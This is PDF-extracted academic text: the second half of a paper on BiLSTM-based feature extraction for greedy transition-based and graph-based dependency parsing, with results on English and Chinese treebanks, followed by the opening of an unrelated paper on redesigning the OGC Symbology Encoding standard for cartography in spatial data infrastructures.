φ(c) = vs2 ◦vs1 ◦vs0 ◦vb0 vi = BILSTM(x1:n, i) This feature function is rather minimal: it takes into account the BiLSTM representations of s1,s0 and b0, which are the items affected by the possible transitions being scored, as well as one extra stack context s2.6 Figure 1 depicts transition scoring with our architecture and this feature function. Note that, unlike previous work, this feature function does not take into account T , the already built structure. The high parsing accuracies in the experimental sections suggest that the BiLSTM encoding is capable of es- timating a lot of the missing information based on the provided stack and buffer elements and the se- quential content between them. While not explored in this work, relying on only four word indices for scoring an action re- sults in very compact state signatures, making our proposed feature representation very appeal- ing for use in transition-based parsers that employ dynamic-programming search (Huang and Sagae, 2010; Kuhlmann et al., 2011). Extended Feature Function One of the benefits of the greedy transition-based parsing framework is precisely its ability to look at arbitrary features from the already built tree. If we allow somewhat less minimal feature function, we could add the BiLSTM vectors corresponding to the right-most and left- most modifiers of s0, s1 and s2, as well as the left- most modifier of b0, reaching a total of 11 BiLSTM vectors. We refer to this as the extended feature set. As we’ll see in Section 6, using the extended set does indeed improve parsing accuracies when using pre-trained word embeddings, but has a minimal ef- fect in the fully-supervised case.7 6An additional buffer context is not needed, as b1 is by def- inition adjacent to b0, a fact that we expect the BiLSTM en- coding of b0 to capture. In contrast, b0, s0, s1 and s2 are not necessarily adjacent to each other in the original sentence. 7We did not experiment with other feature configurations. It is well possible that not all of the additional 7 child encodings are needed for the observed accuracy gains, and that a smaller feature set will yield similar or even better improvements. 319 4.1 Details of the Training Algorithm The training objective is to set the score of correct transitions above the scores of incorrect transitions. We use a margin-based objective, aiming to maxi- mize the margin between the highest scoring correct action and the highest scoring incorrect action. The hinge loss at each parsing configuration c is defined as: max ( 0,1−max to∈G MLP ( φ(c) ) [to] + max tp∈A\G MLP ( φ(c) ) [tp] ) where A is the set of possible transitions and G is the set of correct (gold) transitions at the cur- rent stage. At each stage of the training process the parser scores the possible transitions A, incurs a loss, selects a transition to follow, and moves to the next configuration based on it. The local losses are summed throughout the parsing process of a sen- tence, and the parameters are updated with respect to the sum of the losses at sentence boundaries.8 The gradients of the entire network (including the MLP and the BiLSTM) with respect to the sum of the losses are calculated using the backpropagation algorithm. As usual, we perform several training it- erations over the training corpus, shuffling the order of sentences in each iteration. Error-Exploration and Dynamic Oracle Training We follow Goldberg and Nivre (2013);Goldberg and Nivre (2012) in using error exploration training with a dynamic-oracle, which we briefly describe below. At each stage in the training process, the parser assigns scores to all the possible transitions t ∈ A. It then selects a transition, applies it, and moves to the next step. Which transition should be followed? A common approach follows the highest scoring tran- sition that can lead to the gold tree. However, when training in this way the parser sees only configura- tions that result from following correct actions, and as a result tends to suffer from error propagation at 8To increase gradient stability and training speed, we simu- late mini-batch updates by only updating the parameters when the sum of local losses contains at least 50 non-zero elements. Sums of fewer elements are carried across sentences. This as- sures us a sufficient number of gradient samples for every up- date thus minimizing the effect of gradient instability. test time. Instead, in error-exploration training the parser follows the highest scoring action in A dur- ing training even if this action is incorrect, exposing it to configurations that result from erroneous deci- sions. This strategy requires defining the set G such that the correct actions to take are well-defined also for states that cannot lead to the gold tree. Such a set G is called a dynamic oracle. We perform error-exploration training using the dynamic-oracle defined by Goldberg and Nivre (2013). Aggressive Exploration We found that even when using error-exploration, after one iteration the model remembers the training set quite well, and does not make enough errors to make error-exploration effec- tive. In order to expose the parser to more errors, we follow an aggressive-exploration scheme: we sometimes follow incorrect transitions also if they score below correct transitions. Specifically, when the score of the correct transition is greater than that of the wrong transition but the difference is smaller than a margin constant, we chose to follow the incor- rect action with probability pagg (we use pagg = 0.1 in our experiments). Summary The greedy transition-based parser follows standard techniques from the literature (margin-based objective, dynamic oracle training, error exploration, MLP-based non-linear scoring function). We depart from the literature by re- placing the hand-crafted feature function over care- fully selected components of the configuration with a concatenation of BiLSTM representations of a few prominent items on the stack and the buffer, and training the BiLSTM encoder jointly with the rest of the network. 5 Graph-based Parser Graph-based parsing follows the common structured prediction paradigm (Taskar et al., 2005; McDonald et al., 2005): predict(s) = arg max y∈Y(s) scoreglobal(s,y) scoreglobal(s,y) = ∑ part∈y scorelocal(s,part) Given an input sentence s (and the corresponding sequence of vectors x1:n) we look for the highest- 320 LSTMf xthe concat LSTMf xbrown concat LSTMf xfox concat LSTMf xjumped concat LSTMf x∗ concat LSTMb s0 LSTMb s1 LSTMb s2 LSTMb s3 LSTMb s4 Vthe Vbrown Vfox Vjumped V∗ MLP MLP MLP MLP + Figure 2: Illustration of the neural model scheme of the graph-based parser when calculating the score of a given parse tree. The parse tree is depicted below the sentence. Each dependency arc in the sentence is scored using an MLP that is fed the BiLSTM encoding of the words at the arc’s end points (the colors of the arcs correspond to colors of the MLP inputs above), and the individual arc scores are summed to produce the final score. All the MLPs share the same parameters. The figure depicts a single-layer BiLSTM, while in practice we use two layers. When parsing a sentence, we compute scores for all possible n2 arcs, and find the best scoring tree using a dynamic-programming algorithm. scoring parse tree y in the space Y(s) of valid de- pendency trees over s. In order to make the search tractable, the scoring function is decomposed to the sum of local scores for each part independently. In this work, we focus on arc-factored graph based approach presented in McDonald et al. (2005). Arc-factored parsing decomposes the score of a tree to the sum of the score of its head-modifier arcs (h,m): parse(s) = arg max y∈Y(s) ∑ (h,m)∈y score ( φ(s,h,m) ) Given the scores of the arcs the highest scoring pro- jective tree can be efficiently found using Eisner’s decoding algorithm (1996). McDonald et al. and most subsequent work estimate the local score of an arc by a linear model parameterized by a weight vec- tor w, and a feature function φ(s,h,m) assigning a sparse feature vector for an arc linking modifier m to head h. We follow Pei et al. (2015) and replace the linear scoring function with an MLP. The feature extractor φ(s,h,m) is usually com- plex, involving many elements (see Section 2.1). In contrast, our feature extractor uses merely the BiLSTM encoding of the head word and the mod- ifier word: φ(s,h,m) = BIRNN(x1:n,h)◦ BIRNN(x1:n,m) The final model is: parse(s) = arg max y∈Y(s) scoreglobal(s,y) = arg max y∈Y(s) ∑ (h,m)∈y score ( φ(s,h,m) ) = arg max y∈Y(s) ∑ (h,m)∈y MLP(vh ◦vm) vi = BIRNN(x1:n, i) The architecture is illustrated in Figure 2. Training The training objective is to set the score function such that correct tree y is scored above in- correct ones. We use a margin-based objective (Mc- Donald et al., 2005; LeCun et al., 2006), aiming to maximize the margin between the score of the gold tree y and the highest scoring incorrect tree y′. We define a hinge loss with respect to a gold tree y as: 321 max ( 0,1−max y′ 6=y ∑ (h,m)∈y′ MLP(vh ◦vm) + ∑ (h,m)∈y MLP(vh ◦vm) ) Each of the tree scores is then calculated by acti- vating the MLP on the arc representations. The en- tire loss can viewed as the sum of multiple neural networks, which is sub-differentiable. We calculate the gradients of the entire network (including to the BiLSTM encoder and word embeddings). Labeled Parsing Up to now, we described unla- beled parsing. A possible approach for adding la- bels is to score the combination of an unlabeled arc (h,m) and its label ` by considering the label as part of the arc (h,m,`). This results in |Labels|×|Arcs| parts that need to be scored, leading to slow parsing speeds and arguably a harder learning problem. Instead, we chose to first predict the unlabeled structure using the model given above, and then pre- dict the label of each resulting arc. Using this ap- proach, the number of parts stays small, enabling fast parsing. The labeling of an arc (h,m) is performed using the same feature representation φ(s,h,m) fed into a different MLP predictor: label(h,m) = arg max `∈labels MLPLBL(vh ◦vm)[`] As before we use a margin based hinge loss. The la- beler is trained on the gold trees.9 The BiLSTM en- coder responsible for producing vh and vm is shared with the arc-factored parser: the same BiLSTM en- coder is used in the parer and the labeler. This sharing of parameters can be seen as an instance of multi-task learning (Caruana, 1997). As we show in Section 6, the sharing is effective: training the BiLSTM feature encoder to be good at predicting arc-labels significantly improves the parser’s unla- beled accuracy. Loss augmented inference In initial experiments, the network learned quickly and overfit the data. In 9When training the labeled parser, we calculate the structure loss and the labeling loss for each training sentence, and sum the losses prior to computing the gradients. order to remedy this, we found it useful to use loss augmented inference (Taskar et al., 2005). The in- tuition behind loss augmented inference is to update against trees which have high model scores and are also very wrong. This is done by augmenting the score of each part not belonging to the gold tree by adding a constant to its score. Formally, the loss transforms as follows: max(0,1 + score(x,y)− max y′ 6=y ∑ part∈y′ (scorelocal(x,part) + 1part6∈y)) Speed improvements The arc-factored model re- quires the scoring of n2 arcs. Scoring is performed using an MLP with one hidden layer, resulting in n2 matrix-vector multiplications from the input to the hidden layer, and n2 multiplications from the hid- den to the output layer. The first n2 multiplications involve larger dimensional input and output vectors, and are the most time consuming. Fortunately, these can be reduced to 2n multiplications and n2 vec- tor additions, by observing that the multiplication W · (vh ◦vm) can be written as W1 ·vh + W2 ·vm where W1 and W1 are are the first and second half of the matrix W and reusing the products across dif- ferent pairs. Summary The graph-based parser is straight- forward first-order parser, trained with a margin- based hinge-loss and loss-augmented inference. We depart from the literature by replacing the hand- crafted feature function with a concatenation of BiLSTM representations of the head and modifier words, and training the BiLSTM encoder jointly with the structured objective. We also introduce a novel multi-task learning approach for labeled pars- ing by training a second-stage arc-labeler sharing the same BiLSTM encoder with the unlabeled parser. 6 Experiments and Results We evaluated our parsing model on English and Chi- nese data. For comparison purposes we follow the setup of Dyer et al. (2015). Data For English, we used the Stanford Depen- dency (SD) (de Marneffe and Manning, 2008) con- version of the Penn Treebank (Marcus et al., 1993), using the standard train/dev/test splits with the 322 System Method Representation Emb PTB-YM PTB-SD CTB UAS UAS LAS UAS LAS This work graph, 1st order 2 BiLSTM vectors – – 93.1 91.0 86.6 85.1 This work transition (greedy, dyn-oracle) 4 BiLSTM vectors – – 93.1 91.0 86.2 85.0 This work transition (greedy, dyn-oracle) 11 BiLSTM vectors – – 93.2 91.2 86.5 84.9 ZhangNivre11 transition (beam) large feature set (sparse) – 92.9 – – 86.0 84.4 Martins13 (TurboParser) graph, 3rd order+ large feature set (sparse) – 92.8 93.1 – – – Pei15 graph, 2nd order large feature set (dense) – 93.0 – – – – Dyer15 transition (greedy) Stack-LSTM + composition – – 92.4 90.0 85.7 84.1 Ballesteros16 transition (greedy, dyn-oracle) Stack-LSTM + composition – – 92.7 90.6 86.1 84.5 This work graph, 1st order 2 BiLSTM vectors YES – 93.0 90.9 86.5 84.9 This work transition (greedy, dyn-oracle) 4 BiLSTM vectors YES – 93.6 91.5 87.4 85.9 This work transition (greedy, dyn-oracle) 11 BiLSTM vectors YES – 93.9 91.9 87.6 86.1 Weiss15 transition (greedy) large feature set (dense) YES – 93.2 91.2 – – Weiss15 transition (beam) large feature set (dense) YES – 94.0 92.0 – – Pei15 graph, 2nd order large feature set (dense) YES 93.3 – – – – Dyer15 transition (greedy) Stack-LSTM + composition YES – 93.1 90.9 87.1 85.5 Ballesteros16 transition (greedy, dyn-oracle) Stack-LSTM + composition YES – 93.6 91.4 87.6 86.2 LeZuidema14 reranking /blend inside-outside recursive net YES 93.1 93.8 91.5 – – Zhu15 reranking /blend recursive conv-net YES 93.8 – – 85.7 – Table 1: Test-set parsing results of various state-of-the-art parsing systems on the English (PTB) and Chinese (CTB) datasets. The systems that use embeddings may use different pre-trained embeddings. English results use predicted POS tags (different systems use different taggers), while Chinese results use gold POS tags. PTB-YM: English PTB, Yamada and Matsumoto head rules. PTB-SD: English PTB, Stanford Dependencies (different systems may use different versions of the Stanford converter). CTB: Chinese Treebank. reranking /blend in Method column indicates a reranking system where the reranker score is interpolated with the base-parser’s score. The different systems and the numbers reported from them are taken from: ZhangNivre11: (Zhang and Nivre, 2011); Martins13: (Martins et al., 2013); Weiss15 (Weiss et al., 2015); Pei15: (Pei et al., 2015); Dyer15 (Dyer et al., 2015); Ballesteros16 (Ballesteros et al., 2016); LeZuidema14 (Le and Zuidema, 2014); Zhu15: (Zhu et al., 2015). same predicted POS-tags as used in Dyer et al. (2015);Chen and Manning (2014). This dataset con- tains a few non-projective trees. Punctuation sym- bols are excluded from the evaluation. For Chinese, we use the Penn Chinese Treebank 5.1 (CTB5), using the train/test/dev splits of (Zhang and Clark, 2008; Dyer et al., 2015) with gold part- of-speech tags, also following (Dyer et al., 2015; Chen and Manning, 2014). When using external word embeddings, we also use the same data as Dyer et al. (2015).10 Implementation Details The parsers are imple- mented in python, using the PyCNN toolkit11 for neural network training. The code is available at the github repository https://github.com/ elikip/bist-parser. We use the LSTM vari- ant implemented in PyCNN, and optimize using the Adam optimizer (Kingma and Ba, 2015). Unless otherwise noted, we use the default values provided by PyCNN (e.g. for random initialization, learning rates etc). 10We thank Dyer et al. for sharing their data with us. 11https://github.com/clab/cnn/tree/ master/pycnn The word and POS embeddings e(wi) and e(pi) are initialized to random values and trained together with the rest of the parsers’ networks. In some ex- periments, we introduce also pre-trained word em- beddings. In those cases, the vector representa- tion of a word is a concatenation of its randomly- initialized vector embedding with its pre-trained word vector. Both are tuned during training. We use the same word vectors as in Dyer et al. (2015) During training, we employ a variant of word dropout (Iyyer et al., 2015), and replace a word with the unknown-word symbol with probability that is inversely proportional to the frequency of the word. A word w appearing #(w) times in the training cor- pus is replaced with the unknown symbol with prob- ability punk(w) = α #(w)+α . If a word was dropped the external embedding of the word is also dropped with probability 0.5. We train the parsers for up to 30 iterations, and choose the best model according to the UAS accu- racy on the development set. Hyperparameter Tuning We performed a very minimal hyper-parameter search with the graph- 323 https://github.com/elikip/bist-parser https://github.com/elikip/bist-parser https://github.com/clab/cnn/tree/master/pycnn https://github.com/clab/cnn/tree/master/pycnn based parser, and use the same hyper-parameters for both parsers. The hyper-parameters of the final net- works used for all the reported experiments are de- tailed in Table 2. Word embedding dimension 100 POS tag embedding dimension 25 Hidden units in MLP 100 Hidden units in MLPLBL 100 BI-LSTM Layers 2 BI-LSTM Dimensions (hidden/output) 125 / 125 α (for word dropout) 0.25 pagg (for exploration training) 0.1 Table 2: Hyper-parameter values used in experiments Main Results Table 1 lists the test-set accuracies of our best parsing models, compared to other state-of- the-art parsers from the literature.12 It is clear that our parsers are very competitive, despite using very simple parsing architectures and minimal feature extractors. When not using external embeddings, the first-order graph-based parser with 2 features outperforms all other systems that are not using external resources, including the third-order TurboParser. The greedy transition based parser with 4 features also matches or outperforms most other parsers, including the beam-based transition parser with heavily engineered features of Zhang and Nivre (2011) and the Stack-LSTM parser of Dyer et al. (2015), as well as the same parser when trained using a dynamic oracle (Ballesteros et al., 2016). Moving from the simple (4 features) to the extended (11 features) feature set leads to some gains in accuracy for both English and Chinese. Interestingly, when adding external word embed- dings the accuracy of the graph-based parser de- grades. We are not sure why this happens, and leave the exploration of effective semi-supervised parsing with the graph-based model for future work. The greedy parser does manage to benefit from the ex- ternal embeddings, and using them we also see gains from moving from the simple to the extended feature set. Both feature sets result in very competitive re- 12Unfortunately, many papers still report English parsing results on the deficient Yamada and Matsumoto head rules (PTB-YM) rather than the more modern Stanford-dependencies (PTB-SD). We note that the PTB-YM and PTB-SD results are not strictly comparable, and in our experience the PTB-YM re- sults are usually about half a UAS point higher. sults, with the extended feature set yielding the best reported results for Chinese, and ranked second for English, after the heavily-tuned beam-based parser of Weiss et al. (2015). Additional Results We perform some ablation ex- periments in order to quantify the effect of the dif- ferent components on our best models (Table 3). PTB CTB UAS LAS UAS LAS Graph (no ext. emb) 93.3 91.0 87.0 85.4 –POS 92.9 89.8 80.6 76.8 –ArcLabeler 92.7 – 86.2 – –Loss Aug. 81.3 79.4 52.6 51.7 Greedy (ext. emb) 93.8 91.5 87.8 86.0 –POS 93.4 91.2 83.4 81.6 –DynOracle 93.5 91.4 87.5 85.9 Table 3: Ablation experiments results (dev set) for the graph- based parser without external embeddings and the greedy parser with external embeddings and extended feature set. Loss augmented inference is crucial for the success of the graph-based parser, and the multi-task learn- ing scheme for the arc-labeler contributes nicely to the unlabeled scores. Dynamic oracle training yields nice gains for both English and Chinese. 7 Conclusion We presented a pleasingly effective approach for feature extraction for dependency parsing based on a BiLSTM encoder that is trained jointly with the parser, and demonstrated its effectiveness by inte- grating it into two simple parsing models: a greedy transition-based parser and a globally optimized first-order graph-based parser, yielding very com- petitive parsing accuracies in both cases. Acknowledgements This research is supported by the Intel Collaborative Research Institute for Com- putational Intelligence (ICRI-CI) and the Israeli Sci- ence Foundation (grant number 1555/15). We thank Lillian Lee for her important feedback and efforts invested in editing this paper. We also thank the re- viewers for their valuable comments. References Miguel Ballesteros, Yoav Goldberg, Chris Dyer, and Noah A. Smith. 2016. Training with explo- 324 ration improves a greedy stack-LSTM parser. CoRR, abs/1603.03793. Rich Caruana. 1997. Multitask learning. Machine Learning, 28:41–75, July. Danqi Chen and Christopher Manning. 2014. A fast and accurate dependency parser using neural networks. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 740–750, Doha, Qatar, October. Association for Computational Linguistics. Jason P.C. Chiu and Eric Nichols. 2016. Named entity recognition with bidirectional LSTM-CNNs. Transac- tions of the Association for Computational Linguistics, 4. To appear. Kyunghyun Cho. 2015. Natural language under- standing with distributed representation. CoRR, abs/1511.07916. James Cross and Liang Huang. 2016. Incremental pars- ing with minimal features using bi-directional LSTM. In Proceedings of the 54th Annual Meeting of the As- sociation for Computational Linguistics, Berlin, Ger- many, August. Association for Computational Lin- guistics. Marie-Catherine de Marneffe and Christopher D. Man- ning. 2008. Stanford dependencies manual. Techni- cal report, Stanford University. Chris Dyer, Miguel Ballesteros, Wang Ling, Austin Matthews, and Noah A. Smith. 2015. Transition- based dependency parsing with stack long short-term memory. In Proceedings of the 53rd Annual Meet- ing of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 1: Long Papers), pages 334–343, Beijing, China, July. Association for Com- putational Linguistics. Jason Eisner. 1996. Three new probabilistic models for dependency parsing: An exploration. In 16th Interna- tional Conference on Computational Linguistics, Pro- ceedings of the Conference, COLING 1996, Center for Sprogteknologi, Copenhagen, Denmark, August 5-9, 1996, pages 340–345. Jeffrey L. Elman. 1990. Finding structure in time. Cog- nitive Science, 14(2):179–211. Yoav Goldberg and Joakim Nivre. 2012. A dynamic ora- cle for arc-eager dependency parsing. In Proceedings of COLING 2012, pages 959–976, Mumbai, India, De- cember. The COLING 2012 Organizing Committee. Yoav Goldberg and Joakim Nivre. 2013. Training deterministic parsers with non-deterministic oracles. Transactions of the Association for Computational Linguistics, 1:403–414. Yoav Goldberg. 2015. A primer on neural net- work models for natural language processing. CoRR, abs/1510.00726. Alex Graves. 2008. Supervised sequence labelling with recurrent neural networks. Ph.D. thesis, Technical University Munich. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9(8):1735– 1780. Liang Huang and Kenji Sagae. 2010. Dynamic pro- gramming for linear-time incremental parsing. In Pro- ceedings of the 48th Annual Meeting of the Associa- tion for Computational Linguistics, pages 1077–1086, Uppsala, Sweden, July. Association for Computational Linguistics. Ozan Irsoy and Claire Cardie. 2014. Opinion mining with deep recurrent neural networks. In Proceedings of the 2014 Conference on Empirical Methods in Nat- ural Language Processing (EMNLP), pages 720–728, Doha, Qatar, October. Association for Computational Linguistics. Mohit Iyyer, Varun Manjunatha, Jordan Boyd-Graber, and Hal Daumé III. 2015. Deep unordered composi- tion rivals syntactic methods for text classification. In Proceedings of the 53rd Annual Meeting of the Associ- ation for Computational Linguistics and the 7th Inter- national Joint Conference on Natural Language Pro- cessing (Volume 1: Long Papers), pages 1681–1691, Beijing, China, July. Association for Computational Linguistics. Andrej Karpathy, Justin Johnson, and Fei-Fei Li. 2015. Visualizing and understanding recurrent networks. CoRR, abs/1506.02078. Diederik P. Kingma and Jimmy Ba. 2015. Adam: A method for stochastic optimization. In Proceedings of the 3rd International Conference for Learning Repre- sentations, San Diego, California. Eliyahu Kiperwasser and Yoav Goldberg. 2016. Easy-first dependency parsing with hierarchical tree LSTMs. Transactions of the Association for Compu- tational Linguistics, 4. To appear. Terry Koo and Michael Collins. 2010. Efficient third- order dependency parsers. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics, pages 1–11, Uppsala, Sweden, July. Asso- ciation for Computational Linguistics. Terry Koo, Xavier Carreras, and Michael Collins. 2008. Simple semi-supervised dependency parsing. In Pro- ceedings of the 46th Annual Meeting of the Associ- ation for Computational Linguistics, pages 595–603, Columbus, Ohio, June. Association for Computational Linguistics. Sandra Kübler, Ryan T. McDonald, and Joakim Nivre. 2009. Dependency Parsing. Synthesis Lectures on Human Language Technologies. Morgan & Claypool Publishers. 325 Marco Kuhlmann, Carlos Gómez-Rodríguez, and Gior- gio Satta. 2011. Dynamic programming algorithms for transition-based dependency parsers. In Proceed- ings of the 49th Annual Meeting of the Association for Computational Linguistics: Human Language Tech- nologies, pages 673–682, Portland, Oregon, USA, June. Association for Computational Linguistics. Guillaume Lample, Miguel Ballesteros, Sandeep Subra- manian, Kazuya Kawakami, and Chris Dyer. 2016. Neural architectures for named entity recognition. In Proceedings of the 2016 Conference of the North American Chapter of the Association for Computa- tional Linguistics: Human Language Technologies, pages 260–270, San Diego, California, June. Associ- ation for Computational Linguistics. Phong Le and Willem Zuidema. 2014. The inside- outside recursive neural network model for depen- dency parsing. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Process- ing (EMNLP), pages 729–739, Doha, Qatar, October. Association for Computational Linguistics. Yann LeCun, Sumit Chopra, Raia Hadsell, Marc’Aurelio Ranzato, and Fu Jie Huang. 2006. A tutorial on energy-based learning. Predicting structured data, 1. Tao Lei, Yu Xin, Yuan Zhang, Regina Barzilay, and Tommi Jaakkola. 2014. Low-rank tensors for scor- ing dependency structures. In Proceedings of the 52nd Annual Meeting of the Association for Compu- tational Linguistics (Volume 1: Long Papers), pages 1381–1391, Baltimore, Maryland, June. Association for Computational Linguistics. Mike Lewis, Kenton Lee, and Luke Zettlemoyer. 2016. LSTM CCG parsing. In Proceedings of the 2016 Con- ference of the North American Chapter of the Associa- tion for Computational Linguistics: Human Language Technologies, pages 221–231, San Diego, California, June. Association for Computational Linguistics. Mitchell P. Marcus, Beatrice Santorini, and Mary Ann Marcinkiewicz. 1993. Building a large annotated cor- pus of English: The Penn Treebank. Computational Linguistics, 19(2):313–330. Andre Martins, Noah A. Smith, and Eric Xing. 2009. Concise integer linear programming formulations for dependency parsing. In Proceedings of the Joint Con- ference of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Lan- guage Processing of the AFNLP, pages 342–350, Sun- tec, Singapore, August. Association for Computational Linguistics. Andre Martins, Miguel Almeida, and Noah A. Smith. 2013. Turning on the turbo: Fast third-order non- projective turbo parsers. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (Volume 2: Short Papers), pages 617–622, Sofia, Bulgaria, August. Association for Computa- tional Linguistics. Ryan McDonald, Koby Crammer, and Fernando Pereira. 2005. Online large-margin training of dependency parsers. In Proceedings of the 43rd Annual Meet- ing of the Association for Computational Linguistics (ACL’05), pages 91–98, Ann Arbor, Michigan, June. Association for Computational Linguistics. Ryan McDonald. 2006. Discriminative Training and Spanning Tree Algorithms for Dependency Parsing. Ph.D. thesis, University of Pennsylvania. Joakim Nivre. 2004. Incrementality in deterministic de- pendency parsing. In Frank Keller, Stephen Clark, Matthew Crocker, and Mark Steedman, editors, Pro- ceedings of the ACL Workshop Incremental Parsing: Bringing Engineering and Cognition Together, pages 50–57, Barcelona, Spain, July. Association for Com- putational Linguistics. Joakim Nivre. 2008. Algorithms for deterministic incre- mental dependency parsing. Computational Linguis- tics, 34(4):513–553. Wenzhe Pei, Tao Ge, and Baobao Chang. 2015. An ef- fective neural network model for graph-based depen- dency parsing. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguis- tics and the 7th International Joint Conference on Nat- ural Language Processing (Volume 1: Long Papers), pages 313–322, Beijing, China, July. Association for Computational Linguistics. Mike Schuster and Kuldip K. Paliwal. 1997. Bidirec- tional recurrent neural networks. IEEE Trans. Signal Processing, 45(11):2673–2681. Benjamin Taskar, Vassil Chatalbashev, Daphne Koller, and Carlos Guestrin. 2005. Learning structured pre- diction models: A large margin approach. In Machine Learning, Proceedings of the Twenty-Second Interna- tional Conference (ICML 2005), Bonn, Germany, Au- gust 7-11, 2005, pages 896–903. Hillel Taub-Tabib, Yoav Goldberg, and Amir Glober- son. 2015. Template kernels for dependency pars- ing. In Proceedings of the 2015 Conference of the North American Chapter of the Association for Com- putational Linguistics: Human Language Technolo- gies, pages 1422–1427, Denver, Colorado, May–June. Association for Computational Linguistics. Ivan Titov and James Henderson. 2007. A latent variable model for generative dependency parsing. In Proceed- ings of the Tenth International Conference on Parsing Technologies, pages 144–155, Prague, Czech Repub- lic, June. Association for Computational Linguistics. Ashish Vaswani, Yonatan Bisk, Kenji Sagae, and Ryan Musa. 2016. Supertagging with LSTMs. In Pro- ceedings of the 15th Annual Conference of the North 326 American Chapter of the Association for Computa- tional Linguistics (Short Papers), San Diego, Califor- nia, June. Oriol Vinyals, Lukasz Kaiser, Terry Koo, Slav Petrov, Ilya Sutskever, and Geoffrey E. Hinton. 2015. Gram- mar as a foreign language. In Advances in Neural In- formation Processing Systems 28: Annual Conference on Neural Information Processing Systems 2015, De- cember 7-12, 2015, Montreal, Quebec, Canada, pages 2773–2781. David Weiss, Chris Alberti, Michael Collins, and Slav Petrov. 2015. Structured training for neural network transition-based parsing. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 1: Long Pa- pers), pages 323–333, Beijing, China, July. Associa- tion for Computational Linguistics. Yue Zhang and Stephen Clark. 2008. A tale of two parsers: Investigating and combining graph-based and transition-based dependency parsing. In Proceedings of the 2008 Conference on Empirical Methods in Nat- ural Language Processing, pages 562–571, Honolulu, Hawaii, October. Association for Computational Lin- guistics. Yue Zhang and Joakim Nivre. 2011. Transition-based dependency parsing with rich non-local features. In Proceedings of the 49th Annual Meeting of the Asso- ciation for Computational Linguistics: Human Lan- guage Technologies, pages 188–193, Portland, Ore- gon, USA, June. Association for Computational Lin- guistics. Chenxi Zhu, Xipeng Qiu, Xinchi Chen, and Xuanjing Huang. 2015. A re-ranking model for dependency parser with recursive convolutional neural network. In Proceedings of the 53rd Annual Meeting of the Associ- ation for Computational Linguistics and the 7th Inter- national Joint Conference on Natural Language Pro- cessing (Volume 1: Long Papers), pages 1159–1168, Beijing, China, July. Association for Computational Linguistics. 327 328 work_kqfkki6bovhuvk6e77bdp4fxei ---- A redesign of OGC Symbology Encoding standard for sharing cartography A redesign of OGC Symbology Encoding standard for sharing cartography Erwan Bocher1 ,* and Olivier Ertz2,* 1 CNRS, Lab-STICC Laboratory, UMR 6285, Vannes, France 2 Media Engineering Institute, HEIG-VD, University of Applied Sciences and Arts Western Switzerland, Yverdon-les-Bains, Vaud, Switzerland * These authors contributed equally to this work. ABSTRACT Despite most Spatial Data Infrastructures offering service-based visualization of geospatial data, requirements are often at a very basic level leading to poor quality of maps. This is a general observation for any geospatial architecture as soon as open standards as those of the Open Geospatial Consortium (OGC) are applied. To improve the situation, this paper does focus on improvements at the portrayal interoperability side by considering standardization aspects. We propose two major redesign recommendations. First to consolidate the cartographic theory at the core of the OGC Symbology Encoding standard. Secondly to build the standard in a modular way so as to be ready to be extended with upcoming future cartographic requirements. Thus, we start by defining portrayal interoperability by means of typical-use cases that frame the concept of sharing cartography. Then we bring to light the strengths and limits of the relevant open standards to consider in this context. Finally we propose a set of recommendations to overcome the limits so as to make these use cases a true reality. Even if the definition of a cartographic-oriented standard is not able to act as a complete cartographic design framework by itself, we argue that pushing forward the standardization work dedicated to cartography is a way to share and disseminate good practices and finally to improve the quality of the visualizations. Subjects Spatial and Geographic Information Systems, World Wide Web and Web Science Keywords Cartography, Spatial Data Infrastructure, Open standards, Portrayal interoperability, Open Geospatial Consortium INTRODUCTION Given how good geospatial technologies take advantage of the constant evolution of information and communication technologies, Spatial Data Infrastructure (SDI) appeared as a new paradigm in geospatial data handling. It extends desktop GIS (Craglia, 2010) where data collected by other organizations can be searched, retrieved and manipulated for several usages (Tóth et al., 2012). Many regional, national and international initiatives have setup well-defined access policies to promote the arrangement of SDI because location information is important in managing everything that a governance has to organize. Currently, several SDI initiatives are particularly well implemented to encourage data discovery and sharing across different communities with various applications. Also service-based visualization of geospatial data is part of the SDI components. In the case of How to cite this article Bocher and Ertz (2018), A redesign of OGC Symbology Encoding standard for sharing cartography. PeerJ Comput. Sci. 4:e143; DOI 10.7717/peerj-cs.143 Submitted 31 May 2017 Accepted 1 December 2017 Published 8 January 2018 Corresponding author Olivier Ertz, olivier.ertz@heig-vd.ch Academic editor Gabriella Pasi Additional Information and Declarations can be found on page 27 DOI 10.7717/peerj-cs.143 Copyright 2018 Bocher and Ertz Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.143 mailto:olivier.�ertz@�heig-vd.�ch https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.143 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ INSPIRE, the infrastructure for spatial information in Europe, requirements are defined at a basic level according to INSPIRE Drafting Team (2014), in section 16, and INSPIRE Drafting Team (2008) in section A.11, which defines only general portrayal rules as recommendations. As an example, we may notice the technical guidelines on geology (INSPIRE Thematic Working Group Geology, 2013) which does not specify styles required to be supported by INSPIRE view services (section 11.2) but only recommended styles, often simple to excess, just defining some color tables, stroke width and color, spacing for dashed lines and graphic patterns to repeat in a surface or over a line. These are relatively simple to render with current implementation standards in use. Extreme simplicity may be intentional for some cases, but it may also reveal limitations from these implementation standards as soon as styles resulting from a cartographic design are more complex (Ertz, 2013). As a consequence, according to Hopfstock & Grünreich (2009), with cartographic rules defined at such a basic level, portrayal seems to be considered as a concern of second zone, almost ignoring “the importance of visualization for transforming spatial data into useful GI.” Even worse, some contemporary maps coming from SDI exhibit a serious lack of knowledge in cartography with many map-makers repeating some basic mistakes. Such as maps from Eurostat/Regional Statistics (2017) where population is represented as a choropleth map (e.g., population on 1st of January in NUTS 2 regions). Field (2014) points out that the current demand is for quantity, not for quality, and it is the Internet (not the discipline of cartography) which is reacting to this 